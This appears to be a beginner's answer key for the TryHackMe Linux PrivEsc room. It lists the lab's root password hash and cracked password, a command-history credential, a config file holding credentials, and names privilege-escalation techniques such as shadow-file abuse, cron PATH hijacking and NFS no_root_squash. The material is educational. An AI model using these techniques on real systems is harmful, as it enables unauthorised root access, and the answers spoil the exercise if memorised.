THM | Linux PrivEsc
Shells and Privilege Escalation | Linux PrivEsc | Summary:
This series of walkthroughs aims to help out complete beginners with finishing the Complete Beginner path on the TryHackMe website. It is based on the learning content provided in the Linux PrivEsc room.
Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance.
01 | Deploy the Vulnerable Debian VM
Question 1: Deploy the machine and login to the "user" account using SSH.
No answer needed
Question 2: Run the "id" command. What is the result?
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
02 | Service Exploits
Question 1: Read and follow along with the above.
No answer needed
03 | Weak File Permissions - Readable /etc/shadow
Question 1: What is the root user's password hash?
$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0
Question 2: What hashing algorithm was used to produce the root user's password hash?
sha512crypt
Question 3: What is the root user's password?
password123
04 | Weak File Permissions - Writable /etc/shadow
Question 1: Read and follow along with the above.
No answer needed
05 | Weak File Permissions - Writable /etc/passwd
Question 1: Run the "id" command as the newroot user. What is the result?
uid=0(root) gid=0(root) groups=0(root)
06 | Sudo - Shell Escape Sequences
Question 1: How many programs is "user" allowed to run via sudo?
11
Question 2: One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?
apache2
Question 3: Consider how you might use this program with sudo to gain root privileges without a shell escape sequence.
No answer needed
07 | Sudo - Environment Variables
Question 1: Read and follow along with the above.
No answer needed
08 | Cron Jobs - File Permissions
Question 1: Read and follow along with the above.
No answer needed
09 | Cron Jobs - PATH Environment Variable
Question 1: What is the value of the PATH variable in /etc/crontab?
/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
10 | Cron Jobs - Wildcards
Question 1: Read and follow along with the above.
No answer needed
11 | SUID / SGID Executables - Known Exploits
Question 1: Read and follow along with the above.
No answer needed
12 | SUID / SGID Executables - Shared Object Injection
Question 1: Read and follow along with the above.
No answer needed
13 | SUID / SGID Executables - Environment Variables
Question 1: Read and follow along with the above.
No answer needed
14 | SUID / SGID Executables - Abusing Shell Features (#1)
Question 1: Read and follow along with the above.
No answer needed
15 | SUID / SGID Executables - Abusing Shell Features (#2)
Question 1: Read and follow along with the above.
No answer needed
16 | Passwords & Keys - History Files
Question 1: What is the full mysql command the user executed?
mysql -h somehost.local -uroot -ppassword123
17 | Passwords & Keys - Config Files
Question 1: What file did you find the root user's credentials in?
/etc/openvpn/auth.txt
18 | Passwords & Keys - SSH Keys
Question 1: Read and follow along with the above.
No answer needed
19 | NFS
Question 1: What is the name of the option that disables root squashing?
no_root_squash
20 | Kernel Exploits
Question 1: Read and follow along with the above.
No answer needed
21 | Privilege Escalation Scripts
Question 1: Experiment with all three tools, running them with different options. Do all of them identify the techniques used in this room?
No answer needed